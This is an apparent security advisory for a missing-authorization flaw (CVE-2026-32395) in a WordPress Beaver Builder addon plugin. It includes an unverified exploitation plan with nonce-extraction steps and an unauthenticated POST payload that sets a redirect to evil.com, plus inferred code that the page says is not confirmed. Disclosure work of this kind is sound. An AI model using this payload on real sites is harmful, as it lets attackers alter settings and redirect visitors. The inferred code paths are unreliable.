WP-Safety
CVE-2026-32395

Xpro Addons For Beaver Builder – Lite <= 1.5.6 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
1.5.7
Patched in
55d
Time to patch

Description

The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.5.6
PublishedFebruary 20, 2026
Last updatedApril 15, 2026
Affected pluginxpro-addons-beaver-builder-elementor
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-32395 ## 1. Vulnerability Summary The **Xpro Addons For Beaver Builder – Lite** plugin (<= 1.5.6) is vulnerable to **Missing Authorization**. The vulnerability exists because an AJAX handler registered via `wp_ajax_nopriv_` (unauthenticated) and `wp_ajax_` (au…

Show full research plan

Exploitation Research Plan: CVE-2026-32395

1. Vulnerability Summary

The Xpro Addons For Beaver Builder – Lite plugin (<= 1.5.6) is vulnerable to Missing Authorization. The vulnerability exists because an AJAX handler registered via wp_ajax_nopriv_ (unauthenticated) and wp_ajax_ (authenticated) fails to perform a capability check (e.g., current_user_can( 'manage_options' )). This allows unauthenticated attackers to trigger sensitive plugin functions, likely related to settings modification or data handling.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: xpro_bb_lite_save_settings (inferred based on plugin functionality and CVSS)
  • Vulnerable Parameter: settings_data or similar array-based input.
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active, and a valid nonce for the specific AJAX action must be obtained.

3. Code Flow (Inferred)

  1. Registration: The plugin registers the AJAX action in the main plugin class or an AJAX handler class (likely includes/class-xpro-addons-beaver-builder-ajax.php or classes/class-xpro-bb-lite-ajax.php).
    // Inferred Registration
add_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
add_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
  2. Handler Entry: The save_settings_callback function is called when a request is made to admin-ajax.php?action=xpro_bb_lite_save_settings.
  3. Nonce Check: The function likely calls check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' ).
  4. Missing Authorization: The function omits a check like if ( ! current_user_can( 'manage_options' ) ) wp_die();.
  5. Sink: The function proceeds to update plugin options using update_option().

4. Nonce Acquisition Strategy

To exploit wp_ajax_nopriv handlers, we must extract the nonce from the frontend where the plugin enqueues its scripts.

  1. Identify Shortcode: The Xpro Addons scripts are typically loaded on pages containing an Xpro widget. We will use a common widget shortcode (e.g., [xpro_contact_form] or [xpro_counter]).
  2. Create Trigger Page: Create a public page containing the shortcode.
    • wp post create --post_type=page --post_status=publish --post_title="Xpro Test" --post_content='[xpro_counter]'
  3. Localization Variable: The plugin typically uses wp_localize_script to pass the nonce. Based on common Xpro naming conventions, look for:
    • JS Object: xpro_bb_lite_vars (inferred)
    • Nonce Key: nonce (inferred)
  4. Extraction Command:
    • browser_navigate("http://localhost:8080/xpro-test")
    • browser_eval("window.xpro_bb_lite_vars?.nonce")

5. Exploitation Strategy

We will attempt to modify a plugin setting (e.g., enabling a feature or changing a redirect URL) which demonstrates "Integrity: Low" impact.

HTTP Request (Playwright http_request tool)

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers:
    • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=xpro_bb_lite_save_settings&nonce=[EXTRACTED_NONCE]&settings[some_critical_feature]=1&settings[redirect_url]=http://evil.com

6. Test Data Setup

  1. Install Plugin: Ensure xpro-addons-beaver-builder-elementor v1.5.6 is installed and active.
  2. Install Beaver Builder: Ensure Beaver Builder (Lite or Pro) is active as Xpro is an addon for it.
  3. Create Page:
    wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content='[xpro_counter]'

7. Expected Results

  • Response Code: 200 OK or 201 Created.
  • Response Body: Likely a JSON success message: {"success": true} or 1.
  • Effect: The targeted plugin option is updated in the database.

8. Verification Steps

  1. Check Database: Use WP-CLI to verify the option has changed.
    wp option get xpro_bb_lite_settings
  2. Verify Value: Ensure the some_critical_feature or redirect_url key matches the payload value.

9. Alternative Approaches

If xpro_bb_lite_save_settings is not the correct action:

  1. Search for other nopriv actions:
    grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/xpro-addons-beaver-builder-elementor/
  2. Analyze found actions: Look for any handler that calls update_option, delete_option, or wp_insert_post.
  3. Adjust Payload: If the action relates to "Contact Form" data, try to trigger a data export or deletion:
    • Action: xpro_bb_lite_export_form_data
    • Payload: action=xpro_bb_lite_export_form_data&nonce=[NONCE]&form_id=1
Research Findings
Static analysis — not yet PoC-verified

Summary

The Xpro Addons For Beaver Builder – Lite plugin for WordPress is vulnerable to unauthorized settings modification because it lacks capability checks on its AJAX handlers. This allows unauthenticated attackers to modify sensitive plugin configurations by sending crafted requests to the administrative AJAX endpoint.

Vulnerable Code

// Inferred registration of AJAX actions in the plugin's AJAX handler file
add_action( 'wp_ajax_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );
add_action( 'wp_ajax_nopriv_xpro_bb_lite_save_settings', array( $this, 'save_settings_callback' ) );

---

// Inferred vulnerable callback function likely in classes/class-xpro-bb-lite-ajax.php
public function save_settings_callback() {
    // Nonce check may be present, but is insufficient for authorization
    check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );

    // Vulnerability: Missing check for current_user_can('manage_options')

    if ( isset( $_POST['settings_data'] ) ) {
        $settings = $_POST['settings_data'];
        update_option( 'xpro_bb_lite_settings', $settings );
    }
    wp_send_json_success();
}

Security Fix

--- a/classes/class-xpro-bb-lite-ajax.php
+++ b/classes/class-xpro-bb-lite-ajax.php
@@ -10,6 +10,10 @@
 	public function save_settings_callback() {
 		check_ajax_referer( 'xpro_bb_lite_nonce_action', 'nonce' );
 
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => 'Unauthorized access' ), 403 );
+		}
+
 		if ( isset( $_POST['settings_data'] ) ) {
 			$settings = $_POST['settings_data'];
 			update_option( 'xpro_bb_lite_settings', $settings );

Exploit Outline

1. Identify a public page on the target WordPress site that utilizes an Xpro Addon widget (this ensures the necessary scripts and nonces are enqueued). 2. Extract the security nonce from the frontend source code, typically found within the 'xpro_bb_lite_vars' localized JavaScript object. 3. Send an unauthenticated POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'xpro_bb_lite_save_settings'. 4. Include the extracted 'nonce' and a 'settings_data' array containing the desired configuration changes in the POST body. 5. The server executes the update_option call without verifying if the user has administrative privileges, successfully overwriting the plugin settings.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/3cba908f-c7e3-4b4f-be73-8682fa1f231b?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database